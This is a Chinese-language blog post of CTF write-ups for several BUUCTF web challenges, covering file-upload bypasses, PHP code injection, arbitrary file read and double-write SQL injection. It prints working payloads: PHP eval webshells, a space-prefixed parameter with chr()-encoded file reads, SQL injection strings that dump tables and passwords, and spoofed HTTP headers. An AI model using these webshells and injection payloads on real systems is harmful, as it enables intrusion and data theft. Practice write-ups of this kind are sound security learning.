<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="且将新火试新茶，诗酒趁年华">
    <meta name="author" content="Drunkbaby">
    
    <title>
        
            Buu之Web部分刷题记录 |
        
        Drunkbaby&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/font/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"drun1baby.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true},"style":{"primary_color":"#0066cc","logo":"https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/logo.png","favicon":"https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png","avatar":"https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png","font_size":"15px","font_family":null,"hover":{"shadow":true,"scale":true},"first_screen":{"enable":true,"header_transparent":true,"background_img":"/images/bg.svg","description":"且将新火试新茶，诗酒趁年华","font_color":null,"hitokoto":false},"scroll":{"progress_bar":true,"percent":false}},"local_search":{"enable":true,"preload":true},"code_copy":{},"code_block":{"tools":{"enable":true,"style":"mac"},"highlight_theme":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":false},"comment":{"enable":true,"use":"valine","valine":{"enable":true,"appid":"mCIu9X4iLP3I0GikUoetB9bV-9Nh9j0Va","appkey":"ermlV1eoB1YODT088EdXjo6C","placeholder":"just go go","background":"/images/comment_bg.png","count":true},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.8"},"waline":{"server_url":null,"reaction":false,"version":2}},"post":{"author_label":{"enable":true,"auto":true,"custom_label_list":["Trainee","Engineer","Architect"]},"word_count":{"enable":true,"wordcount":true,"min2read":true},"img_align":"left","copyright_info":true},"version":"3.6.1"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/logo.png">
                </a>
            
            <a class="logo-title" href="/">
               Drunkbaby&#39;s Blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            <div class="article-title">
                <span class="title-hover-animation">Buu之Web部分刷题记录</span>
            </div>

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">Drunkbaby</span>
                            
                                <span class="author-label">Lv6</span>
                            
                        </div>
                        <div class="meta-info">
                            
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2022-07-20 17:40:34</span>
        <span class="mobile">2022-07-20 17:40</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2023-03-26 10:48:47</span>
    </span>
    
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/CTF/">CTF</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/CTF%E5%88%B7%E9%A2%98/">CTF刷题</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>5.7k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>23 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content keep-markdown-body">
                

                <span id="more"></span>
<h2 id="ACTF2020-新生赛Upload"><a href="#ACTF2020-新生赛Upload" class="headerlink" title="ACTF2020-新生赛Upload"></a>ACTF2020-新生赛Upload</h2><p>界面如图所示，很明显的文件上传题目</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ACTF2020_Upload.png" class="">

<p>简单先编写一个 shell.jpg 的文件，编写一句话木马</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> @<span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'shell'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>然后直接上传，上传成功</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/UploadJPGSucc.png" class="">

<p>抓包后，修改后缀为 .php，不出所料得被阻挡了，换成 .phtml，成功上传，并通过中国蚁剑连接。找出 flag</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/GetFlag.png" class="">

<h3 id="源码解析"><a href="#源码解析" class="headerlink" title="源码解析"></a>源码解析</h3><img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/UploadCode.png" class="">

<blockquote>
<p>第 110 行<br>if(in_array($ext, [‘php’, ‘php3’, ‘php4’, ‘php5’])) 判断后缀是否在此数组中，简单过滤 php</p>
<p>第 114 行<br><code>$new_file_name = md5($file_name).&quot;.&quot;.$ext;</code>  将文件名转换为 md5 的形式，再上传。</p>
<p>在文件夹中还发现了 .htaccess 文件，所以还可以通过覆盖 .htaccess 文件的方式进行 getshell</p>
</blockquote>
<h2 id="强网杯2019-Upload"><a href="#强网杯2019-Upload" class="headerlink" title="强网杯2019-Upload"></a>强网杯2019-Upload</h2><h3 id="0x01-题目"><a href="#0x01-题目" class="headerlink" title="0x01 题目"></a>0x01 题目</h3><p>根据题目名称来看，既然是 Upload，那就不去考虑登录注册界面的 SQL 注入了。</p>
<p>简单注册登录之后的界面</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/QWB2019_Upload.png" class="">

<p>上传简单的一句话木马，会被过滤。尝试进一步的 EXP</p>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script language<span class="token operator">=</span><span class="token string">'php'</span><span class="token operator">></span><span class="token function">eval</span><span class="token punctuation">(</span>$_POST<span class="token punctuation">[</span><span class="token string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">;</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>上传成功，之后是一个 &#x2F;upload 的界面，没看懂</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Upload.png" class="">

<p>既然是上传成功了，看一看能不能直接连接 shell 吧。</p>
<p>连接失败，应该是被解析了，或者不在这个位置吧，去看看 Js 里面有没有玄机。</p>
<p>解密了一下，也不是 md5；Js 写的也没问题。</p>
<p>没啥思路啊，想办法去找源代码</p>
<h3 id="0x02-找源代码"><a href="#0x02-找源代码" class="headerlink" title="0x02 找源代码"></a>0x02 找源代码</h3><p>尝试把 cookie 扔进去 base64 解析一下，发现确实有疑点，说不定是反序列化的题目。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/SerialSee.png" class="">

<p>这里我们可以看到 img 的位置，但是并没有被解析成 php 或者 html，js 等等可执行的语句。</p>
<p>用御剑扫出源码，目录为 <code>/www.tar.gz</code></p>
<p>下载源代码，先看路由</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Route.png" class="">

<p>一切正常，主要看 <code>upload</code> 的功能点，文件位置位于 <strong>Profile.php</strong> 下</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">ext</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
 <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">getimagesize</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">filename_tmp</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
 @<span class="token function">copy</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">filename_tmp</span><span class="token punctuation">,</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">filename</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
 @<span class="token function">unlink</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">filename_tmp</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$this</span><span class="token operator">-></span><span class="token property">img</span><span class="token operator">=</span><span class="token string double-quoted-string">"../upload/<span class="token interpolation"><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">upload_menu</span></span>/<span class="token interpolation"><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">filename</span></span>"</span><span class="token punctuation">;</span>
	<span class="token variable">$this</span><span class="token operator">-></span><span class="token function">update_img</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
	<span class="token variable">$this</span><span class="token operator">-></span><span class="token function">error</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'Forbidden type!'</span><span class="token punctuation">,</span> <span class="token function">url</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'../index'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>img 这里的 upload_menu 和 filename 都是可疑对象，逐个排查一下。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Upload_menu.png" class="">

<p>清楚了，果然是 md5 加密，再去看 filename 的。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Filename_Code.png" class="">

<p>Filename 则是先经过 md5 加密之后再转换成 png 的格式。</p>
<p>感觉没啥用，去找序列化的功能点。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/SerialCode.png" class="">、

<p>也没啥用，好好分析一下文件上传这个功能点。</p>
<blockquote>
<p>尝试一下利用 GET 请求绕过</p>
</blockquote>
<h2 id="RoarCTF2019-EasyCalc"><a href="#RoarCTF2019-EasyCalc" class="headerlink" title="RoarCTF2019-EasyCalc"></a>RoarCTF2019-EasyCalc</h2><h3 id="0x01-题目-1"><a href="#0x01-题目-1" class="headerlink" title="0x01 题目"></a>0x01 题目</h3><p>靶场界面如图所示</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Roar2019_Calc.png" class="">

<p>既然是输入表达式，那么直接输入 <code>2*2</code> 试试</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Calc.png" class="">

<p>得到结果为 4，这里猜测是否存在 ssti，输入 <code>&#123;&#123;2*2&#125;&#125;</code>，发现有一种被 WAF 拦截的感觉。</p>
<ul>
<li>有点没思路了，f12 看看</li>
</ul>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Calc.png" class="">

<p>果然是设置了 WAF，不过这种 WAF，CTF 里面怎么可能是真正的 WAF 设备，只是一些规则吧。</p>
<p>还有一点非常引人注目，url 这里，看到了 <code>calc.php</code>，我们跳到 <code>calc.php</code> 看看。发现了一段过滤规则的源码，拷到 vscode 里面。</p>
<h3 id="0x02-代码审计"><a href="#0x02-代码审计" class="headerlink" title="0x02 代码审计"></a>0x02 代码审计</h3><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'num'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
 <span class="token function">show_source</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
 	<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'num'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
 	<span class="token variable">$blacklist</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string single-quoted-string">' '</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'\t'</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'\r'</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'\n'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'\''</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'"'</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'`'</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'\['</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'\]'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'\$'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'\\'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'\^'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
 	<span class="token keyword">foreach</span> <span class="token punctuation">(</span><span class="token variable">$blacklist</span> <span class="token keyword">as</span> <span class="token variable">$blackitem</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
 		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/'</span> <span class="token operator">.</span> <span class="token variable">$blackitem</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'/m'</span><span class="token punctuation">,</span> <span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
 		<span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"what are you want to do?"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
 		<span class="token punctuation">&#125;</span>
 	<span class="token punctuation">&#125;</span>
 	<span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'echo '</span><span class="token operator">.</span><span class="token variable">$str</span><span class="token operator">.</span><span class="token string single-quoted-string">';'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这里 <code>preg_match</code> 的写法挺有意思的，可以借鉴一下</p>
<p>foreach 进来，匹配不同的规则 <code>/m</code> 这里多行查找，避免了 CRLF 的绕过手段，</p>
<h3 id="0x03-绕过手段"><a href="#0x03-绕过手段" class="headerlink" title="0x03 绕过手段"></a>0x03 绕过手段</h3><p>使用空格绕过，当php进行解析的时候，如果变量前有空格，就会删去空格再进行解析。<br>而前面的黑名单中就没有考虑到这个状况，我们就可以在num的前面加个空格来绕过，因为这是我们的变量名就是“ num”而不是“num”了。</p>
<p>尝试一下</p>
<pre class="line-numbers language-none"><code class="language-none">http:&#x2F;&#x2F;node4.buuoj.cn:27411&#x2F;calc.php?%20num&#x3D;phpinfo();<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>确实可以</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Poc.png" class="">

<h3 id="0x04-构造-EXP"><a href="#0x04-构造-EXP" class="headerlink" title="0x04 构造 EXP"></a>0x04 构造 EXP</h3><p>OK，我们已经知道如何利用了，接下来就是要去找 flag 所在的地方。<br>在 PHP 中的命令为 <code>scandir</code>，那么我们的初步 EXP 为</p>
<pre class="line-numbers language-none"><code class="language-none">http:&#x2F;&#x2F;node4.buuoj.cn:27411&#x2F;calc.php?%20num&#x3D;print_r(scandir(&#x2F;));<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>注意到之前的地方，<code>/</code> 也是被过滤的，这里我们使用 <code>chr(47)</code> 绕过斜杠</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/SuccessOne.png" class="">

<p>看到这里有个文件夹名为 <code>flagg</code>，用 <code>file_get_contents</code> 把它搞出来。</p>
<p>读取 flagg，对应一个个的 ascii 码。</p>
<pre class="line-numbers language-none"><code class="language-none">file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/End.png" class="">

<h2 id="RoarCTF2019-Easy-Java"><a href="#RoarCTF2019-Easy-Java" class="headerlink" title="RoarCTF2019-Easy Java"></a>RoarCTF2019-Easy Java</h2><p>弱口令 admin，admin888 进去，发现没什么信息</p>
<p>将help界面用 POST 发包，能够进行任意文件读取。因为是个 Java 题目，去读 <code>WEB-INF/web.xml</code></p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Roar2019EasyJavaFiles.png" class="">

<p>读与 flag 有关的 FlagController，但是这里是需要加上后缀 <code>.class</code> 的</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Roar2019_JavaFlag.png" class="">

<p><code>ZmxhZ3tlMDM1MjM5MS0xMTliLTRmZTUtOWVhOS0xMDEzMTMyZjYzMTR9Cg==</code> base64 解码</p>
<p>flag{e0352391-119b-4fe5-9ea9-1013132f6314}</p>
<h2 id="极客大挑战-2019-BabySQL"><a href="#极客大挑战-2019-BabySQL" class="headerlink" title="极客大挑战 2019 BabySQL"></a>极客大挑战 2019 BabySQL</h2><p>老方法，先输入<code>1&#39;</code>来观察SQL语句，确定SQL闭合之后开始尝试</p>
<p>发现万能密码，联合注入都不行</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/wrong.png" class="">

<p>使用order by判断字段数，也不行，而且发现输入的order只剩下了der，<code>or</code>被过滤。得出结论，union，select，or都被过滤。</p>
<ul>
<li>尝试双写绕过</li>
</ul>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span>' uniunionon selselectect <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>成功绕过</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/raoguo.png" class="">

<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span>' uniunionon selselectect <span class="token number">1</span><span class="token punctuation">,</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/zhuru.png" class="">

<p>这里想要进行下一步的爆破表名，结果爆破的时候居然出问题了</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">' uniunionon selselectect 1,group_concat(table_name) from information_schema.tables where table_schema='</span>geek'<span class="token punctuation">,</span><span class="token number">3</span><span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/guolv.png" class="">

<p>发现from和where也被过滤了……………………</p>
<p>继续进行双写绕过，其中<code>information</code>中因为有”or”，所以也要对”or”进行双写绕过。</p>
<p>payload</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='</span>geek' <span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/sx2.png" class="">

<p>爆破column名</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='</span>geek' <span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/sx3.png" class="">

<p>最后：</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span>' ununionion selselectect <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span>group_concat<span class="token punctuation">(</span>passwoorrd<span class="token punctuation">)</span> frfromom b4bsql <span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ul>
<li>这里的“password”也需要进行双写绕过</li>
</ul>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/success.png" class="">

<h2 id="极客大挑战-2019-EasySQL"><a href="#极客大挑战-2019-EasySQL" class="headerlink" title="极客大挑战 2019 EasySQL"></a>极客大挑战 2019 EasySQL</h2><p>先输入<code>1&#39;</code>测试SQL语句</p>
<p>得知SQL语句后，进行联合注入，直接出来了…………</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Geek_EasySQL_succ.png" class="">

<h2 id="极客大挑战-2019Http"><a href="#极客大挑战-2019Http" class="headerlink" title="极客大挑战-2019Http"></a>极客大挑战-2019Http</h2><p>打开靶场，就是一个 php 的界面，抓包之后发包，无发现可利用信息。</p>
<p>因为题名为 HTTP，马上想到 HTTP 请求，于是输入 id &#x3D; 1，无其他回显。<br>用 Burpsuite 内置的工具，检查一下是否存在可疑界面</p>

<p>发现了一个可疑网站，进去康康</p>


<p>点进去之后界面如图所示</p>


<p>虽然提示说 “It doesn’t come from ‘<a class="link"   target="_blank" rel="noopener" href="https://sycsecret.buuoj.cn/" >https://Sycsecret.buuoj.cn<i class="fas fa-external-link-alt"></i></a>‘ “ 不管，头铁就是要进去看看。结果 500 了</p>
<p>这里很可疑的是 Referer，修改 Referer 为 上述 URL 试一试。</p>


<p>出现了不一样的回显，是个好消息。但是还是没有搞到 flag，根据提示 “Please use “Syclover” browser”，Syclover 怎么可能是个浏览器，此时想到 User-Agent。替换 User-Agent 再尝试一次。</p>


<p>回显再次改变，”No!!! you can only read this locally!!!”</p>
<p>伪造 XFF: 127.0.0.1</p>


<p>成功获取到 flag~</p>
<h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>本道题主要考察了 HTTP Headers 的一堆知识，这里再总结一下</p>
<p>Referer：<code>Referer</code> 请求头包含了当前请求页面的来源页面的地址，即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用 <code>Referer</code> 请求头识别访问来源。Referer 实际上是 referrer 的错误写法哈哈哈哈。</p>
<p>User-Agent：简写也叫 UA，是特征符，每一个软件都对应一个 UA。同样的，UA 可以被事先伪造。比如 Xray 的 UA 会被伪造成 Firefor Mozila。</p>
<p>XFF：全称 X-Forwarded-For，在客户端访问服务器的过程中如果需要经过HTTP代理或者负载均衡服务器，可以被用来获取最初发起请求的客户端的IP地址。</p>
